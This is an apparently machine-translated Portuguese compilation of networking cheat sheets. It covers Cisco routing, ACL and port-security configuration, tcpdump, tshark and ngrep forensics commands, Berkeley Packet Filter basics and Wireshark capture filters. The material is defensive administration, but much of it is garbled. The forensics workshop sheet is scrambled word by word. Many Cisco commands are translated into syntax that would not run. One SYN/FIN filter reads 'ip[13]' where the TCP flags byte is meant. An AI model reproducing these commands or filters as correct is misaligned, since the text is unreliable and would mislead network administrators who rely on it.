você crie loops redundantes na sua rede Cisco para tolerância a falhas e evita que loops inadvertidos que podem ser criados na sua rede acabem com ela.

O código a seguir habilitará o Rapid Per VLAN Spanning Tree Protocol (PVST) proprietário da Cisco sobre o padrão aberto do Multiple Spanning Tree Protocol (MSTP). Além de configurar o STP no switch, você também
configurará a porta 2 no switch para o portfast, o que permite que a porta faça a transição imediatamente para o modo de encaminhamento.
Switch1> enable Switch1#
configure terminal Switch1(config)#spanning-tree
mode rapid-pvst Switch1(config)#interface FastEthernet 0/2 Switch1(config-if)#spanning-
tree portfast %Aviso: o portfast deve ser habilitado somente em portas conectadas
a um único host. Conectar hubs, concentradores, switches, bridges, etc... a esta
interface quando o portfast estiver habilitado pode causar loops de bridging temporários.

Use com CUIDADO %Portfast

será configurado em 10 interfaces devido ao comando range, mas só terá efeito quando as interfaces estiverem em um modo não
entroncamento.

Gerenciando roteamento estático para redes Cisco

Ao trabalhar com seus roteadores na sua rede Cisco, é bem provável que você queira que seus roteadores roteiem dados. O primeiro passo para que seu roteador passe dados de uma interface para outra é habilitar o
roteamento; basta usar estes comandos.
Roteador1>habilitar
Roteador1#configurar terminal
Roteador1(config) #roteamento ip

Independentemente de escolher ou não usar um protocolo de roteamento dinâmico, você pode adicionar rotas estáticas ao seu roteador. O seguinte adicionará uma rota estática ao Router1 para
enviar dados à rede 192.168.5.0/24 usando o roteador com o endereço IP 192.168.3.2.
Roteador1>habilitar
Roteador1#configurar terminal
Roteador1(config)#roteamento ip Roteador1
(config) #rota ip 192.168.5.0 255.255.255.0 192.168.3.2

Gerenciamento do protocolo de informações de roteamento para redes Cisco

O Routing Information Protocol (RIP) é amplamente usado, com a versão 2 permitindo que você use Variable Length Subnet Masks (VLSM) em sua rede. O código a seguir habilitará o roteamento, habilitará o RIP,
definirá o RIP para a versão 2, desabilitará a sumarização de rotas, definirá a rede distribuída deste roteador como 192.168.5.0/24 e, em vez de transmitir rotas, enviará dados RIP diretamente para 192.168.1.1.

Roteador2>habilitar
Roteador2#configurar terminal Roteador2(config)
#roteamento ip Roteador2(config)#router rip
Roteador2(config-router)#versão 2 Roteador2(config-
router)#sem resumo automático Roteador1(config-router)#rede
192.168.5.0 Roteador2(config-router)#vizinho 192.168.1.1

Gerenciando o protocolo de roteamento de gateway interno aprimorado para redes Cisco O Protocolo de Roteamento de Gateway

Interno Aprimorado (EIGRP) é a versão atualizada do IGRP. O código a seguir habilitará o EIGRP usando um número de sistema autônomo (AS) de 100, distribuirá duas redes e desabilitará o resumo automático.

Roteador2>habilitar
Roteador2#configurar terminal Roteador2(config)
#roteamento ip Roteador2(config)#roteador eigrp
100 Roteador2(config-roteador)#rede 192.168.1.0
Roteador2(config-roteador)#rede 192.168.5.0 Roteador2(config-roteador)#sem
resumo automático

Gerenciando o caminho mais curto aberto primeiro para redes Cisco O Open Shortest Path First

(OSPF) é um protocolo de estado de link amplamente usado. O OSPF usa o endereço da interface de loopback como o identificador OSPF, então este exemplo definirá o endereço da interface de loopback, então habilitará o
OSPF com um ID de processo de 100 e distribuirá uma rede de 192.168.255.254 e uma rede de 192.168. 5.0/24
Roteador2>habilitar
Roteador2#configurar terminal

18 12
Machine Translated by Google

Roteador2(config)#interface loopback 0
Roteador2(config-if)# endereço ip 192.168.255.254 255.255.255.0
Roteador2(config-if)#exit
Roteador2(config)#roteador ospf 100
Roteador2(config-router)#rede 192.168.255.254 0.0.0.0 área 0
Roteador2(config-router)#rede 192.168.5.0 0.0.0.255 área 0
Exibindo informações de roteamento para redes Cisco
Após configurar qualquer protocolo de roteamento que você queira implementar - RIP, OSPF ou EIGRP - você pode visualizar todas as suas informações de roteamento por meio do comando
ip route. A seguir está um exemplo da saída deste comando. A saída inclui uma legenda mostrando os códigos para cada protocolo de roteamento, e as rotas específicas são identificadas pelo
protocolo de origem.
Roteador2>habilitar
Senha:
Roteador2#mostrar rota ip
Códigos: C - conectado, S - estático, R - RIP, M - móvel, B - BGP
D - EIGRP, EX - EIGRP externo, O - OSPF, IA - OSPF inter área
N1 - OSPF NSSA externo tipo 1, N2 - OSPF NSSA externo tipo 2
E1 - OSPF externo tipo 1, E2 - OSPF externo tipo 2
i - IS-IS, su - resumo IS-IS, L1 - IS-IS nível 1, L2 - IS-IS nível 2
ia - inter área IS-IS, * - candidato padrão, U - rota estática por usuário
o - ODR, P - rota estática baixada periodicamente
O gateway de último recurso não está definido
E 192.168.10.0/24 [90/284160] via 192.168.1.1, 00:04:19, FastEthernet0/0
O 192.168.10.0/24 [110/11] através de 192.168.1.1, 00:01:01, FastEthernet0/0
R 192.168.10.0/24 [120/1] através de 192.168.1.1, 00:00:07, FastEthernet0/0
C 192.168.5.0/24 está conectado diretamente, FastEthernet0/1
C 192.168.1.0/24 está conectado diretamente, FastEthernet0/0
S 192.168.3.0/24 [1/0] via 192.168.1.1
Protegendo uma rede Cisco
A segurança é sempre uma preocupação, e sua rede Cisco precisa ser protegida adequadamente. Nas seções a seguir, você verá como proteger sua rede Cisco configurando NAT, configurando uma ACL e aplicando essa
ACL.

Protegendo sua rede Cisco configurando NAT

Os comandos a seguir são usados para configurar serviços de sobrecarga NAT em um roteador chamado Router1. Neste exemplo, uma lista de endereços de origem é criada na lista de acesso #1, que é
então usada como a lista de origem interna. A porta FastEthernet 0/0 é a porta de endereço público sobrecarregada para a qual todos os endereços internos são traduzidos.
Roteador1>habilitar
Roteador1#configurar terminal
Roteador1(config)#lista-de-acesso 1 permite 10.0.0.0 0.255.255.255
Roteador1(config)#ip nat dentro da lista de origem 1 interface FastEthernet 0/0 sobrecarga
Roteador1(config)#interface FastEthernet0/0
Roteador1(config-if)#ip nat externo
Roteador1(config-if)#interface FastEthernet0/1
Roteador1(config-if)#ip nat dentro
Protegendo sua rede Cisco configurando uma lista de controle de acesso (ACL)
ACLs são usadas para controlar o fluxo de tráfego. Elas podem ser usadas para permitir ou negar o fluxo de tráfego. Os dois principais tipos de ACLs são:

• ACLs padrão, que têm menos opções para classificar dados e controlar o fluxo de tráfego do que ACLs estendidas. Elas só conseguem gerenciar o tráfego com base no IP de origem
endereço. Essas ACLs são numeradas de 1 a 99 e de 1300 a 1999.

• ACLs estendidas, que oferecem a capacidade de filtrar ou controlar o tráfego com base em uma variedade de critérios, como endereços IP de origem ou destino, bem como tipo de protocolo, como,
ICMP, TCP, UDP ou IP. Essas ACLs são numeradas de 100–199 e de 2000–2699.

Para criar uma ACL padrão, você pode usar o exemplo a seguir, que criará uma ACL que permite tráfego para a rede 192.168.8.0/24.
Switch1>ativar
Switch1#configurar terminal
Switch1(config)#access-list 50 permissão 192.168.8.0 0.0.0.255

Para criar uma ACL estendida, você pode usar o exemplo a seguir, que criará uma ACL que permite tráfego com endereços na rede 192.168.8.0/24 e portas tcp de 80 (http) ou 443 (https):

Roteador1>habilitar
Roteador1#configurar terminal
Router1(config)#access-list 101 observação Esta ACL serve para controlar o tráfego de saída do roteador.
Router1(config)#access-list 101 permite tcp 192.168.8.0 0.0.0.255 qualquer eq 80
Router1(config)#access-list 101 permite tcp 192.168.8.0 0.0.0.255 qualquer eq 443
Protegendo sua rede Cisco aplicando uma lista de controle de acesso
Após criar uma Access Control List (ACL), como a ACL 101 criada acima, você pode aplicar essa ACL a uma interface. No exemplo a seguir, essa ACL é colocada para restringir o tráfego de saída em FastEthernet0/1.

Roteador1>habilitar
Roteador1#configurar terminal
Roteador1(config)#interface FastEthernet0/1
Roteador1(config-if)#ip grupo de acesso 101 fora
SEGURANÇA PORTUÁRIA

Alternar>ativar
Senha: cisco
Switch#show running-config
Switch#configurar terminal
Interruptor(config)#interface fa0/12
Acesso ao modo Switch(config-if)#switchport
Switch(config-if)#switchport porta-segurança
Switch(config-if)#switchport porta-segurança máximo 2
Switch(config-if)#switchport violação de segurança de porta desligamento
Switch(config-if)#sem desligamento
Alternar(config-if)#fim
Switch#show porta-interface de segurança fa0/12
Switch#copy configuração-em-execução configuração-de-inicialização

Listas de controle de acesso da Cisco:

ACL padrão: 1 – 99 e 1300 – 1999
• Use uma observação para descrever a ACL (opcional):
1 R1(config)# access-list 1 observação ACL PARA NEGAR

19 13
Machine Translated by Google

ACESSO A PARTIR DE VLAN DE VENDAS

• Crie a ACL, tendo em mente o seguinte:

o ACL usa lógica de primeira correspondência.
o Há uma negação implícita no final da ACL.
R1(config)# lista de acesso 2 negar 192.168.1.77
1 R1(config)# lista de acesso 2 negar 192.168.1.64 0.0.0.31

2
R1(config)# lista de acesso 2 permissão 10.1.0.0 0.0.255.255
3
4
R1(config)# lista de acesso 2 negar 10.0.0.0 0.255.255.255
5
R1(config)# access-list 2 permite qualquer
• Habilite a ACL na interface do roteador escolhida na direção correta (para dentro ou para fora):
1 R1(config-if)# grupo de acesso ip 2 fora
• Usando ACL padrão para limitar o acesso telnet e SSH a um roteador:
Crie a ACL que define os clientes telnet permitidos:
R1(config)# access-list 99 observação CLIENTES TELNET PERMITIDOS
1
2 R1(config)# lista de acesso 99 permissão 192.168.1.128 0.0.0.15

Aplique o ACL nas linhas vty

1 R1(config)# linha vty 0 4
2 R1(config-line)# classe de acesso 99 em
ACL estendido: 100 – 199 e 2000 – 2699

• A ACL estendida deve ser colocada o mais próximo possível da origem do pacote.
• ACL estendida corresponde a pacotes com base em endereços IP de origem e destino, protocolo, números de porta de origem e destino e outros critérios também
R1(config)# access-list 101 observação MY_ACCESS_LIST
R1(config)# lista de acesso 101 negar iphost 10.1.1.1 host 10.2.2.2
1
2 R1(config)# lista de acesso 101 negar tcp 10.1.1.0 0.0.0.255 qualquer eq
3 23
4 R1(config)# lista de acesso 101 negar icmp 10.1.1.1 0.0.0.0 qualquer
5
R1(config)# lista de acesso 101 negar tcphost 10.1.1.0 host 10.0.0.1 eq 80
6
7
R1(config)# lista de acesso 101 negar udphost 10.1.1.7 eq 53 qualquer
8
9 R1(config)# lista de acesso 101 permite ip qualquer qualquer
R1(config)# interface fastEthernet 0/0
R1(config-if)# grupo de acesso ip 101 em
ACL nomeado:
• As ACLs nomeadas usam nomes para identificar ACLs em vez de números, e os comandos que permitem ou negam tráfego são escritos em um submodo chamado
chamado modo ACL (nacl).
• A ACL nomeada permite a edição da ACL (excluindo ou inserindo instruções) sequenciando instruções da ACL.
• ACL padrão nomeado:
1 R1(config)# ip access-list padrão MY_STANDARD_ACL
2
3 R1(config-std-nacl)# permissão 10.1.1.0 0.0.0.255
R1(config-std-nacl)# negar 10.2.2.2
4
R1(config-std-nacl)# permitir qualquer
5
R1(config)# interface fastEthernet 0/1
6
R1(config-if)# grupo de acesso ip MY_STANDARD_ACL out
• ACL estendido nomeado:
R1(config)# lista de acesso ip estendida
1 MY_EXTENDED_ACL
2 R1(config-ext-nacl)# negar icmp 10.1.1.1 0.0.0.0 qualquer

3
R1(config-ext-nacl)# negar tcphost 10.1.1.0 host 10.0.0.1 eq 80
4
5
R1(config-ext-nacl)# permitir ip qualquer qualquer
6
R1(config)# interface fastEthernet 0/1
R1(config-if)# grupo de acesso ip MY_EXTENDED_ACL em
• Edição de ACL usando números de sequência:
R1(config)# lista de acesso ip estendida
1 MY_EXTENDED_ACL
R1(config-ext-nacl)# no 20 declaração de ! Apaga o
2
número de sequência 20
3
R1(config)# lista de acesso ip padrão 99
4 ! insere um
R1(config-std-nacl)# 5 nega declaração 1.1.1.1 com
sequência 5

20 14
(como /
HOSTS
arquivo
um
Gere
em
base
com
hosts)
etc/
PCAP:
arquivo
um
em
DNS
de
Pesquisas

hosts.txt
>
hosts
-z
-q
dump.pcap
-r
tshark

dump.pcap
em
tráfego
o
todo
para
(PHS)
impressão
protocolo
hierarquia
estatísticas
de
Listagem
www.forsvarsmakten.se

io,phs
-z
-q
dump.pcap
-r
tshark
local
rígido
disco
para
USB
drive
pen
seu
em
on_Network_Forensics.zip
Hands-
de
VirtualBox
máquina
a
Descompacte

==
VM
Onion
Security
a
execute
e
VirtualBox
o
Inicie
num
-n
<
>
pcap_dump
IO
iqvx>
<-
ngrep prática
rede
de
Forense
bpf
filtro
<
>
correspondência
de
expressão
Machine Translated by Google

regex.
expressão
na
minúsculas
e
maiúsculas
Ignora
-i segurança
cebola
de
VM
workshop
do
dicas
de
Folha

Nomes
usuário /
senha

==
ot-
informação
nenhuma
emita
não
quieto;
Fique
-q
úteis
cargas
suas
e
pacotes
de
cabeçalhos
que
do
aqui elsa/
127.0.0.1/
https://
ELSA:
caso).
o
for
(se usuário /
senha filtro]
de-
expressão-
[--
[opções]
ra

que
pacotes
os
apenas
exibe
correspondência;
a
Inverte
-v squert/
127.0.0.1/
https://
Squert: serviço.
o
para
porta
da
número
do
conversão
a
Suprime
-n
combinam.
não
usuário /
senha <arquivo...>]
arquivo
hexadecimal
como
também
pacote
do
conteúdo
o
Despeja
-x 127.0.0.1:444/
https://
Snorby: (padrão).
presente
ordem
na
<arquivos>
de
dados
Leia
ASCII.
como |
[-
-r
stdin
denota
'-'
comando.
de
linha
na
ted
[email protected] /
senha

pcap_dump
-Eu Xplico:
127.0.0.1:9876/
https://
ngrep.
no
pcap
entrada
de
Arquivo xplico /
dir ...>
<dir
-R
encontrados.
regulares
arquivos
os
todos
processe
e
diretório
no
recursivamente
Desça
pcap_dump
-O
pcap.
arquivo
um
para
correspondentes
pacotes
os
Envie

num
-n PCAP:
Arquivos <arquivo>
-w

Caminhos
sai.
depois
e
pacotes
de
total
ao
apenas
Corresponde
/
correspondência
de
expressão
Argus:
Arquivos

estendida.
regular
uma
é
correspondência
de
expressão
Uma / juntos.
ra*
estilo
comandos
"encadear"
permitindo
direciona
'-'
saída
Um
argus.
arquivo
de
formato
no
<file>,
a
correspondentes
dados
Anexar
stdout,
argus(5)
registros
os
escrever
para
ra
IDS:
Bro-
do
Registros

/
bpf
filtro ip_lista_branca.py
despejados.
serão
pacotes
quais
especifica
que
filtro
um
Seleciona [opções]
objetos]
agregação-
m
[-
racluster
/
filtro]
de-
expressão-
[--

EXEMPLOS são:
suportados
agregação
de
objetos
Os

"[email protected]"
mail
e-
de
endereço
o
contendo
pacotes
por
PCAP
arquivo
um
em
Pesquisar |
len
[cidr
origem/
de
IP
[l|
saddr/
máscara].

usuá[email protected]
-q
dump.pcap
-I
ngrep |
len
[cidr
destino/
de
IP
[l|
daddr/
máscara].
para
53)
porta
a
(para
DNS
de
solicitações
por
Pesquisar

"pwned.se"
proto transação.
de
protocolo

esporte 'proto'.
uso
o
Implica
origem.
de
porta
da
número
53
porta
dst
pwned.se
-i
-q
snort.log.1428364808
-I
ngrep

dport destino.
de
porta
da
número
'proto'.
de
uso
o
Implica

21
filter-
[--
[opções]
fields]
sort-
m
[-
rasort

==

==
expressão]
tcpdump
contagem
[interface
-n ]
-c
--i ]]
são:
suportados
classificação
de
campos
Os
filtro ]
rde- n--e
<infile>
tshark
(exibir)
<ler
pacotes>
de
<contagem
[<campo>
-q
-r
-R
-c
] ] ] ]

tempo <padrão>
registro
do
início
de
hora filtro>
campos
[<outfile>|-
-T ] ] ] ]
-w
-x
contagem.
de
pacotes
receber
após
Sair
-c
[ -z
<estatísticas> ]
durante total.
duração
registrar
interface.
da
pacotes
Farejar
-i
pacotes>
de
<contagem
-c
opcional
com
origem,
de
IP
endereço
cidr]
saddr[/ host-
de
seja,
(ou
endereços
converter
Não
-n lidos.
serem
a
pacotes
de
máximo
número
o
Defina
IPv4.
endereços
para
cidr
especificação nomes.
para
etc.)
porta,
de
números
ses,
<campo>
-e
exibidos
serem
a
campos
de
lista
à
campo
um
Adicione
arquivo.
do
pacotes
Lê
-r
com
destino,
de
IP
endereço
cidr]
daddr[/ selecionado.
for
campos
-T
se
reproduzir
IPv4.
endereços
para
opcional
cidr
especificação de
vez
em
arquivo
no
brutos
pacotes
os
Grave
-w
os.
imprimindo-
e
analisando rede
objetos
nomes
de
resolução
a
Desabilita
-n
Machine Translated by Google

UDP).
e
TCP
porta
de
nomes
host,
do
nome
(como
EXEMPLOS
esporte origem.
de
porta
da
número
é
isto
pacote;
do
informações
imprima
Não
-q
dport destino.
de
porta
da
número padrão:
saída
na
DNS
pacotes
imprime
e
Sniff
estatísticas.
apenas
impressas,
sejam
pacote
do
informações
as
que
quiser
não
e
estatísticas
calcular
para
-z
opção
uma
usando
estiver
você
se
útil

bytes transação.
bytes
de
total 53
porta
-n
eth0
-i
tcpdump

sbytes dst.
transação
de
bytes
->
src sniffed.pcap:
para
eth0
de
pacotes
100
Capture
entrada>
de
<arquivo
-r

dbytes src.
transação
de
bytes
->
dst sniffed.pcap
-w
100
-c
eth0
-i
tcpdump infile.
arquivo
pacote
do
dados
Ler

pacotes transações.
pacotes
de
total
contagem para/
tráfego
apenas
incluir
para
PCAP
arquivo
um
Filtrar (exibição)>
leitura
de
<filtro
-R
PCAP:
arquivo
novo
um
para
217.195.49.146
de
aplicado.
seja
especificado
filtro
o
que
com
Faz
especiais
forças dst.
pacotes
de
contagem
->
src
-w /
snort.log.1426118407
-r
tcpdump
var/ T
-Campos
dpkts src.
pacotes
de
contagem
->
dst 217.195.49.146
anfitrião
217.195.49.146.pcap
tmp/ -e.
opção
a
com
especificados
campos
dos
valores
Os
decodificados.
pacotes
de
dados
visualizar
ao
saída
da
formato
o
Define

==
[-
rafilteraddr
[-
Tcpflow
filtro]
de-
expressão-
[-- |-
saída>
de
<arquivo
-w
r
[-
'-'.
for
o
se
padrão
na
ou
saída
de
arquivo
no
pacote
do
brutos
dados
Grave
não
que
fluxos
imprime
e
lógica
a
Inverte
-v
para
imprimir
ao
mesmo
binária
saída
a
Força
-B
endereços.
dos
um
qualquer
a
corresponder
-c.
ou
-C
com
console
ASCII
e
hexadecimal
dump
um
imprima
TShark
o
que
com
Faz
-x
EXEMPLOS
por
bytes
max_bytes
que
mais
não
Capturar
-b detalhes.
os
ou
resumo
o
imprimir
após
pacote
do
dados
dos

início:
de
horário
no
base
com
cronológica
ordem
em
217.195.49.0/24
C
classe
rede
a
para
de/
fluxos
os
todos
Liste fluxo.

<estatísticas>
-z
nenhum
armazenar
sem
(stdout),
console
do
Impressão
-c
arquivos
em
capturados
dados
*
-R
racluster |
217.195.49.0/24
rede
---
-w
e
pacote
do
fonte
a
sem
imprime
Console
-C
-n
tempo
-m
rasort
impressos.
sendo
destino
do
detalhes impressas.
sejam
as
apenas
deseja
Use
captura.
ler
terminar
após
resultado
exiba
e
estatísticas
tipos
vários
colete
TShark
o
que
com
Faça
captura
de
arquivo
um
lendo
estiver
você
se
sinalizador
-q
ip_whitelist.txt.
em
listado
está
não
remoto
IP
o
onde
192.168.0.53,
para
de/
fluxos
os
todos
Listar
"After"
(processo
HTTP
processamento
pós-
Executa
-AH
HTTP.
úteis
cargas
extrair
para
processamento) EXEMPLOS
servidor:
do
enviados
bytes
em
base
com
fluxos
Classificar
rede
de
interface
da
pacotes
Captura
-i "index.html":
string
a
contenham
que
solicitações
as
todas
para
HTTP
URI
e
cliente
do
IP
o
Imprima
*
-R
rafilteraddr -f /
-v
etc/
local/
usr/
iface.
chamado
|racluster
192.168.0.53
host
---
-w
ip_whitelist.txt
-n
dbytes
-m
rasort
| PCAP.
arquivo
do
Lê
-r

EXEMPLO
ip.src
-e
campos
-T
index.html"
tém
con-
"http.request.uri
-R
dump.pcap
-r
tshark
http.request.uri
110):
(TCP
POP3
sessões
de
conteúdo
Extrair

110
porta
emails.pcap
-r
tcpflow

22
Machine Translated by Google

TCPDUMP pacotelife.net
Opções de linha de comando
-UM Carga útil do quadro de impressão em ASCII -q Saída rápida

-c <contagem> Sair após capturar pacotes count -r <arquivo> Ler pacotes do arquivo
-D Listar interfaces disponíveis -s <comprimento> Capture até len bytes por pacote
-e Imprimir cabeçalhos de nível de link -S Imprimir números de sequência TCP absolutos

-F <arquivo> Usar arquivo como expressão de filtro -t Não imprima carimbos de data/hora

-G <n> Gire o arquivo de despejo a cada n segundos -v[v[v]] Imprimir saída mais detalhada

-i <iface> Especifica a interface de captura -w <arquivo> Escreve pacotes capturados em arquivo

-K Não verificar somas de verificação TCP -x Carga útil do quadro de impressão em hexadecimal

-EU Listar tipos de links de dados para a interface -X Carga útil do quadro de impressão em hexadecimal e ASCII

-n Não converta endereços em nomes -y <tipo> Especifica o tipo de link de dados

-p Não capture em modo promíscuo -Z <usuário> Remove privilégios de root para usuário

Primitivos de filtro de captura

[origem|dst] host <host> Corresponde a um host como a origem IP, destino ou qualquer um dos dois

éter [origem|dst] host <ehost> gateway host Corresponde a um host como a origem Ethernet, destino ou qualquer um dos dois

<host> Corresponde aos pacotes que usaram o host como gateway

[src|dst] net <rede>/<len> [tcp|udp] [src|dst] Corresponde pacotes de ou para um ponto de extremidade residente na rede

porta <porta> [tcp|udp] [src|dst] portrange <p1>- Corresponde aos pacotes TCP ou UDP enviados para/da porta

<p2> Corresponde pacotes TCP ou UDP de/para uma porta no intervalo fornecido

menos <comprimento> Corresponde a pacotes menores ou iguais ao comprimento

maior <comprimento> Corresponde a pacotes maiores ou iguais a comprimento

(éter|ip|ip6) proto <protocolo> (éter|ip) transmissão Corresponde a um protocolo Ethernet, IPv4 ou IPv6

(éter|ip|ip6) multicast Corresponde a transmissões Ethernet ou IPv4

Corresponde a multicasts Ethernet, IPv4 ou IPv6

tipo (mgt|ctl|dados) [subtipo <subtipo>] Corresponde a quadros 802.11 com base no tipo e subtipo opcional

vlan [<vlan>] Corresponde a quadros 802.1Q, opcionalmente com um ID de VLAN de vlan

mpls [<rótulo>] <expr> Corresponde aos pacotes MPLS, opcionalmente com um rótulo de rótulo

<relocar> <expr> Corresponde pacotes por uma expressão arbitrária

Protocolos Modificadores Exemplos

arpa ip6 escorregar ! ou não porta udp dst não 53 UDP não vinculado à porta 53
éter link TCP && ou e anfitrião 10.0.0.1 e& anfitrião 10.0.0.2 Tráfego entre esses hosts

FDDI ppp tr || ou ou tcp dst porta 80 ou 8080 Pacotes para qualquer porta TCP
rádio UDP-Digitalização

Tipos de ICMP
ICMP-Código de Processo Penal

ip rapp rede sem fio

icmp-echoreply icmp- icmp-routeradvert icmp- icmp-tstampreply

Sinalizadores TCP unreach icmp- routersolicitação icmp- icmp-ireq

tcp-urg tcp-primeiro sourcequench icmp-redirect timxceed icmp- resposta icmp-ireq

tcp-ack tcp- tcp-sincronização icmp-echo paramprob icmp-tstamp icmp-máscara-req

psh tcp-fin resposta-máscara-icmp

por Jeremy Stretch v2.0

23 15
Machine Translated by Google

Berkeley Packet Filters – O básico

Criado por Jeff Stebelton e editado por Chris Davis

Introdução

O que são Berkeley Packet Filters? BPFs são uma interface de soquete raw (independente de protocolo)

para a camada de enlace de dados que permite a filtragem de pacotes de forma muito granular1 .

Trabalhando com BPF

Se você usar tcpdump por muito tempo, você encontrará o que são chamados de “primitivos”,
expressões de filtro para ajustar seus resultados para ver apenas determinado tráfego. Exemplos de
primitivos são “net”, “port” “addr” e qualificadores para aqueles como “src” ou “dst”.

Com eles podemos limitar nossos resultados usando filtros como 'src host 10.10.1.1' ou 'net 10.10'.
Existem muitos deles (veja a página de manual do tcpdump para a lista completa)

Você também pode especificar protocolos, como “ip”, “tcp” ou “icmp”. Alguns até fazem
comparações, como “less” e “greater” para comprimento de pacote.

Essas primitivas são atalhos para BPFs. Cada uma delas faz referência a algum campo ou campos em
um dos cabeçalhos de protocolo de rede. Por exemplo, o campo de protocolo incorporado no cabeçalho IP é

o deslocamento do 9º byte de 0. Se o valor contido ali for 6, o pacote é TCP. Então o primitivo “tcp”

realmente significa mostre-me todos os pacotes no cabeçalho IP cujo deslocamento do 9º byte de 0

contém 6. Se escrevêssemos isso como um BPF, ficaria assim: 'ip[9] = 6' ou usando hexadecimal, 'ip[9] =
0x06' .

BPFs podem ir muito além dos primitivos embutidos , permitindo que sejamos tão granulares quanto
necessário, até o nível de bit único. Se um campo não abranger o byte inteiro, precisaremos escrever
um BPF para olhar os bits em questão para determinar o valor ali.

Vejamos a primeira linha do cabeçalho IP3 para ver um exemplo.

Byte 0 Byte 1 Byte 2 Byte 3

Versão IP Comprimento do Tipo de Comprimento total

cabeçalho IP Serviço

Vemos no byte 0 (começamos a contar a partir de 0, que é o que queremos dizer com deslocamento
de 0) que há dois campos no byte, o campo Versão IP e o Campo Comprimento do Cabeçalho IP.

Se quiséssemos ver qual é a versão IP do pacote, como faríamos isso? Queremos apenas o valor no
nibble de alta ordem (alta ordem = mais à esquerda, pois contamos bits da direita para a esquerda, e um
nibble tem 4 bits, ou meio byte). Para ver esse valor, temos que extraí-lo do

24
16
Machine Translated by Google

byte de dados de alguma forma e olhá-lo singularmente. Para fazer isso, empregamos um método
conhecido como bitmasking. Bitmasking é simplesmente filtrar os bits que não queremos olhar e reter os
que queremos.

Para fazer isso, executaremos uma operação AND bit a bit em todos os bits no byte. Se fizermos AND
nos bits, somente aqueles com valor 1 serão retidos. Vamos dar uma olhada nisso.

Aqui está uma representação binária de um primeiro byte típico no cabeçalho IP:

01000101

Separamos os dois nibbles aqui para maior clareza. Vemos que o nibble de ordem baixa (mais à direita) tem
0101. Este é o comprimento do nosso cabeçalho IP. Queremos verificar o nibble de ordem alta, que tem
o valor 0100. Para fazer isso, adicionaremos 1 a cada bit. Em um AND bit a bit, quaisquer valores, exceto
dois 1's, são iguais a 0. Dois 1's são iguais a um.

Então, para manipular os bits para ver apenas o primeiro nibble, queremos adicionar 1's ao nibble de
ordem alta e 0's ao de ordem baixa. Como todos os 1's serão iguais a F em hexadecimal,
escreveremos uma expressão adicionando hexadecimal F ao primeiro nibble e 0 ao segundo.

Veja como será o BPF:

'ip[0] & 0xF0 = 0x40' (nosso valor de busca). Versão decimal alternativa 'ip[0] & 0xF0 = 64'

Resumindo, estamos dizendo ao tcpdump para olhar o cabeçalho IP (ip), o primeiro byte deslocado de 0
([0]), reter todos os bits no primeiro nibble e descartar todos os bits no nibble de ordem baixa (& 0xF0) e
nos mostrar todos os pacotes com um valor de 4 naquele nibble (= 4).

Aqui está nossa operação em partes…

01000101

11110000

01000000

Agora vemos que o nibble de ordem baixa foi filtrado (todos 0's) e temos o nibble de ordem alta
restante. Binário 0100 = decimal 4, então isso nos mostra que o pacote tem valor 4 no nibble de ordem
alta do primeiro byte; o cabeçalho IP é definido como IPv4.

Filtros de amostra

Agora que vimos como os BPFs funcionam, aqui estão alguns exemplos de filtros que podemos usar para pesquisar:

'ip[9] = 0x11' udp

'ip[9] = 0x01' icmp

'tcp[2:2]' 2º byte, abrangendo dois bytes

25 17
Machine Translated by Google

Pacote de solicitação de eco 'icmp[0] = 0x08'

'tcp[2:2] < 0x14' porta de destino tcp < 20

Vamos criar um filtro para um dos usos mais comuns e complexos: TCP Flags

O campo de sinalizadores no TCP é encontrado no deslocamento de 13 bytes de 0. Os próprios sinalizadores habitam todos
do nibble de ordem inferior e os dois bits de ordem inferior do nibble de ordem superior.

Os dois bits de alta ordem do nibble de alta ordem são usados para ECN (Explicit Congestion
Notification). Aqui está nosso layout…

Byte TCP 13

Vamos supor que desejamos ver todos os pacotes com os flags SYN e FIN definidos. Esse é um
comportamento anômalo e geralmente indicativo de um método de escaneamento de porta.

Nibble de alta ordem Nibble de baixa ordem

128 64 32 16 -- 8 4 2 1 <--- Binário para o byte inteiro

CWR ECE Urg Ack - Empurre Redefinir Sincronização Fin

0 0 0 0 ÿÿ 0 0 1 1 <------ cada nibble convertido diretamente para hexadecimal é 0x03

Usando o gráfico acima, você pode obter valores hexadecimais para filtros, mas também pode usar o

Se quiséssemos simplesmente obter todos os pacotes IP com SOMENTE syn/fin definidos, usaríamos
o seguinte filtro:

'ip[13] = 0x03'

Neste exemplo anterior, dizemos ao tcpdump para ir ao 13º deslocamento do cabeçalho ip (campo flags) e
procurar por pacotes que tenham um valor exato de 0x03 em hexadecimal. No entanto, e se
quiséssemos todos os pacotes que tivessem syn/fin independentemente de terem flags adicionais?

'ip[13] & 0x03 = 0x03'

Este filtro capturará TODOS os pacotes com qualquer número de sinalizadores de combinação, desde que tenham
os sinalizadores syn/fin definidos.

Agora que sabemos como olhar apenas para os bits que precisamos, podemos aplicar isso a qualquer campo, em qualquer

cabeçalho de rede. Você pode, é claro, encadear vários filtros juntos para obter o máximo de especificidade necessário. Aqui

está uma consulta tcpdump para nos mostrar todos os pacotes com o sinalizador Syn definido e um tamanho de

datagrama (pacote) maior que 134 bytes (dados prováveis no pacote Syn) e uma versão de IP que NÃO seja 4:

'tcpdump –nn –i eth0 'tcp[13] & 0x02 = 2 e ip[2:2] > 0x86 e ip[0] & 0xF0 != 4'

26 18
Machine Translated by Google

Filtros de captura do Wireshark

Exemplos
Capture apenas o tráfego de ou para o endereço IP 172.18.5.4:

• hospedar 172.18.5.4

Capture tráfego de ou para um intervalo de endereços IP:

• rede 192.168.0.0/24

ou

• rede 192.168.0.0 máscara 255.255.255.0

Capture tráfego de um intervalo de endereços IP:

• fonte de rede 192.168.0.0/24

ou

• src net 192.168.0.0 máscara 255.255.255.0

Capture tráfego para um intervalo de endereços IP:

• rede dst 192.168.0.0/24

ou

• dst net 192.168.0.0 máscara 255.255.255.0

Capture apenas tráfego DNS (porta 53):

• porta 53

Capture tráfego não HTTP e não SMTP no seu servidor (ambos são equivalentes):

• hospedar www.example.com e não (porta 80 ou porta 25)

host www.example.com e não porta 80 e não porta 25

Capturar, exceto todo o tráfego ARP e DNS:

• porta não 53 e não arp

Capturar tráfego dentro de um intervalo de portas

• (tcp[0:2] > 1500 e tcp[0:2] < 1550) ou (tcp[2:2] > 1500 e tcp[2:2] < 1550)

ou, com versões mais recentes do libpcap (0.9.1 e posteriores):

• tcp portrange 1501-1549

Captura somente Ethernet tipo EAPOL:

• proto éter 0x888e

Rejeitar quadros Ethernet em direção ao grupo Multicast do Protocolo de Descoberta da Camada de Link:

• não éter dst 01:80:c2:00:00:0e

